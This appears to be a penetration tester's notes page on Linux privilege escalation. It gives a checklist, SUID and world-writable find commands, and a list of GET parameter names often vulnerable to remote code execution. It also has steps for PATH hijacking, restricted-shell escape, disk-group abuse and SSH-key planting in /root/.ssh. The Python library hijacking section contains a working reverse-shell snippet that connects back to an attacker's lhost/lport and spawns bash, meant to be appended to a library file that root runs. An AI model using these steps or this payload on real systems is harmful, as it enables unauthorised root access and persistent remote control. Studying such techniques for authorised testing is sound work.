search

linuxChecklist and commands

Mostly we use scripts like :- linpeas , linenum , linux exploit suggerster to do the privesc. But here are some thing we can check manually

chevron-rightCHECKLISThashtag

  • linux kernal exploits

  • check scripts with both SUID <root & owned user>

  • check if their is "exec()" function available in script

  • check if their is "nohup()" function available in script

  • check binary with both SUID <root & owned user>

  • check that binary on GTFObins

  • check source code files & do source code analysing

  • Try to write ssh-key in /root/ .ssh

  • check mysql files

  • Try to write cronjob

  • check .bash_history file

  • python library hijacking

chevron-rightfind commandhashtag
find / -perm -4000 -o -perm -2000 -type f 2>/dev/nul
chevron-rightfindhashtag

find / -perm -u=s 2>/dev/null

find / -perm -o+w 2>/dev/null

find / -perm -4000 -o -perm -2000 -type f 2>/dev/nul

chevron-rightusers and grouphashtag
check group >>      
id
chevron-rightRCE parametershashtag
Top 25 Remote Code Execution (RCE) Parameters [GET based]

?cmd=
?exec=
?command=
?execute=
?ping=
?query=
?jump=
?code=
?reg=
?do=
?func=
?arg=
?option=
?load=
?process=
?step=
?read=
?function=
?req=
?feature=
?exe=
?module=
?payload=
?run=
?print=
chevron-rightpython library hijackinghashtag

  1. find out a script which is executed by root by any means (cronjob or something else...)

  2. check whether the script contains any library for e.g., "import os"

  3. find the library script in system and check whether it is writable or not

find / -type f -name os.py -ls
or
locate os.py

commen locations >>

/usr/lib/python2.7/
/usr/local/lib/python2.7/
/usr/lib/python3/
/usr/lib/python3.0/
/usr/local/lib/python3.0/

  1. Insert a reverse shell in the bottom of the file

import pty
import socket


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
chevron-rightenvironment path hijackinghashtag

we can also use path variable to escalate our priviledges to to next level 1. check if any binary is direct executable by us {for example :- gzip , unzip , tar , base64, etc......} 2. check the path for binary :- which gzip and the value of path variable :- echo $PATH 3. make file with same binary name & inside it inject your payload / rev_shell 4. insert your current location in the path variable :- export PATH=.:$path 5. execute it

chevron-rightrestricted shell escapehashtag

hashtag
ssh to escape rbash or rsh

if you have ssh creds , you can try this :-

https://blog.pentesteracademy.com/breaking-out-of-a-restricted-shell-linux-privilege-escalation-3fb2700cb85earrow-up-right

chevron-right Disk partitionhashtag

hashtag
Exploitation

Step 1: Check if there is disk partition available or not.

Step 2: List available disk partitions.

Step 3: Use debugfs to read files with granted permissions

hashtag
Reference Link

https://vk9-sec.com/disk-group-privilege-escalation/?source=post_page-----b14a6e535e1f--------------------------------arrow-up-right

chevron-rightUSBCreator D-Bus Privilege Escalation via sshhashtag

copy victim (root) ssh key

copy victim (root) ssh key in /tmp dirctory

copy attacker ssh key into victim /root/.ssh

PreviousManuall checksNextRough Draft

Last updated